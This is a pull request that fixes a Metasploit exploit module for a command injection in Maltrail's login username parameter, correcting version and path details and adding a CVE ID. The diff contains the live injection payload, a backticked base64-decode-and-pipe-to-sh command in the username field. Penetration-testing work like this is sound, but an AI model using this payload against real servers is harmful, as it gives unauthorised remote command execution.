### PR TITLE
Fix `exploit/unix/http/maltrail_rce.rb`

### DIFF
--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           Maltrail is a malicious traffic detection system, utilizing publicly
           available blacklists containing malicious and/or generally suspicious trails.
-          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.
-          The `subprocess.check_output` function in `mailtrail/core/http.py` contains
+          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
+          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
           a command injection vulnerability in the `params.get("username")` parameter.
           An attacker can exploit this vulnerability by injecting arbitrary OS commands
           into the username parameter. The injected commands will be executed with the
@@ -31,14 +31,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Ege BALCI <egebalci[at]pm.me>', # msf module
-          'Chris Wild', # original PoC, analysis
+          'Valentin Lobstein',             # Add CVE reference + rewrite
+          'Chris Wild',                    # original PoC, analysis
         ],
         'References' => [
           ['EDB', '51676'],
+          ['CVE', '2025-34073'],
           ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
           ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
         ],
-        'Platform' => ['unix', 'linux'],
+        'Platform' => %w[unix linux],
         'Privileged' => false,
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
@@ -101,13 +103,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    send_request_raw( # This needs to be a raw requess cuz we don't wanna URL encode the body
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'login'),
       'method' => 'POST',
+      'uri_encode_mode' => 'none',
       'headers' => {
         'ctype' => 'application/x-www-form-urlencoded'
       },
-      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the +
+      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
     )
   end
 


### PR DESCRIPTION
Hello Metasploit Team,

This PR contains just a few fixes on the `exploits/unix/http/maltrail_rce.rb` module.

- Fixed description about impacted versions
- Added CVE ID
- Fixed `execute_command` method not to use `send_request_raw` when using `send_request_cgi` with `uri_encode_mode` set to `none`.

Module not tested after these fixes, I need to test first.